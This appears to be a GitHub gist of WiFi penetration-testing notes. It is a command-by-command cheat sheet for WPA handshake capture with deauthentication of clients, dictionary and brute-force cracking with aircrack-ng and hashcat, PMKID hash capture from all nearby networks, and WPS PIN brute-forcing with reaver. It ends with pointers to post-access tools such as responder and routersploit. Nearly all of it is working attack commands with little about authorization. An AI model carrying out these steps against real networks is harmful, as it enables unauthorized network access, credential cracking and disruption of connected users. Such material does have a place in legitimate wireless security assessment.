Skip to content

Instantly share code, notes, and snippets.

@faisalfs10x

faisalfs10x/WiFi-assessment-note.md

Last active May 20, 2023 06:39
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save faisalfs10x/32631869686f7e03b8a70fc77e8555d2 to your computer and use it in GitHub Desktop.
Save faisalfs10x/32631869686f7e03b8a70fc77e8555d2 to your computer and use it in GitHub Desktop.
Download ZIP
WiFi assessment notes
Raw
WiFi-assessment-note.md

WiFi-Pentest-Cheat-Sheet

Hits Repo: https://github.com/faisalfs10x/WiFi-Pentest-Cheat-Sheet

Useful Term/Tool:
    airmon-ng - To enable/disable monitor mode on wireless interfaces
    aireplay-ng - To inject packets into a wireless network, deauthentications attack
    airodump-ng - Wireless packet capture tool used for packet capturing of raw 802.11 frames
    aircrack-ng - A 802.11 WEP / WPA-PSK key cracker
    wash - WiFi Protected Setup Scan Tool
    reaver - WPS Pin Cracker/Bruteforcer
    
    airodump-ng --bssid = AP MAC address
    airodump-ng --essid/ssid = AP name
    airodump-ng -c = channel to listen(focus) on
    aireplay-ng -a = AP MAC address
    aireplay-ng -c = client MAC address 

    [C] = compulsory command
    [O] = optional command
    [O-1] = option 1, run either one option

WPA Attack

[C] Kill all possible programs that could interfere with the wireless card.
kali $ sudo airmon-ng check kill
[C] Check injection mode

image

kali $ sudo aireplay-ng --test wlan0
[C] Start monitor mode

image

[C] kali $ sudo airmon-ng start wlan0
[O] kali $ sudo airmon-ng start wlan0 8 #Set a wlan0 to the monitor mode on a specified channel

[O] kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up
[O] kali $ sudo airmon-ng OR iwconfig #verify monitor mode is in used
[C] Search for all nearby WiFi and take noted on AP bssid and channel

image

kali $ sudo airodump-ng wlan0 -a --wps
[O] List client of selected wifi
[C] kali $ sudo airodump-ng wlan0 -a --channel 11 --bssid A6:91:A8:02:01:9D
[O] kali $ sudo airodump-ng wlan0 -a --channel 11 --essid 'starbuxk-AP'
[C] Open 1st terminal - Monitor WiFi network & capture a WPA/WPA2 4-way handshake *wait until get WPA-handshake or PMKID found appear

image

kali $ sudo airodump-ng wlan0 -a -w starbuxk-AP --channel 11 --bssid A6:91:A8:02:01:9D
[C] Open 2nd terminal - deauth attack - kick target client. * -a = AP MAC address, -c = client MAC address

image

kali $ sudo aireplay-ng wlan0 --deauth 3 -a A6:91:A8:02:01:9D -c 0C:DD:24:9F:F1:91
[O] Check if handshake is available, make sure the result is WPA handshake is 1 or PMKID

image

kali $ aircrack-ng starbuxk.cap
[O] Analysis in wireshark
wireshark starbuxk.cap
Wireshark filter 'eapol' to see 4way handshake
[C] Stop monitor mode
kali $ sudo airmon-ng stop wlan0
kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up
kali $ sudo systemctl restart NetworkManager #enable network manager to be able to connect the WiFi again
[C] Crack without GPU - slow ;(

image

kali $ aircrack-ng starbuxk-01.cap -w /usr/share/wordlist/rockyou.txt
[O] Crack with GPU, need to install GPU driver, recommended to run on Windows - fast ;)
kali $ sudo apt install hcxtools
kali $ hcxpcapngtool starbuxk-01.cap -o starbuxk.hc22000

[O-1] windows $ hashcat.exe -O --force -a 0 -w 3 -m 22000 starbuxk.hc22000 rockyou.txt -r .\rules\dive.rule --session=wifi-cracking #dictionary attack mode, possible time.

[O-2] windows $ hashcat.exe -O --force -a 3 -w 3 -m 22000 starbuxk.hc22000 ?a?a?a?a?a?a?a?a?a --session=wifi-cracking #bruteforce mode, only if you have OP GPU, insane time to complete.
[O] Connect to WiFi
kali $ nmcli d wifi connect starbuxk-AP password wireless01

PMKID Attack - Crack the WPA/WPA2 authentication without deauthenticating clients.

[C] Install requirement tool and start attacking PMKID
kali $ sudo apt-get update && sudo apt-get -y install hcxtools
kali $ sudo hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0 #capturing PMKID hashes for all nearby networks
kali $ hcxpcaptool hcxdumptool_results.cap -k hashes.txt 
windows $hashcat.exe -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt #dictionary attack against PMKID hashes
[O] Once you get an access to a WiFi network, consider run the following Kali tools and make sure you know what you do ;):
Routersploit against router to check known vulnerabilites
yersinia -G
responder -wF -I 192.168.X.X
wireshark

WPS Pin Attack

[C] Take noted on bssid and channel
kali $ sudo airmon-ng start wlan0 #start monitor mode
kali $ sudo wash -a -i wlan0
[C] In new terminal 1
kali $ sudo reaver --bssid C0:C9:E3:F8:2F:82 --channel 2 --interface wlan0 –vvv - no-associate
[C] In new terminal 2
kali $ sudo aireplay-ng --fakeauth 30 -a C0:C9:E3:F8:2F:82 -h 00-C0-CA-92-7B-03 wlan0
Reference
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment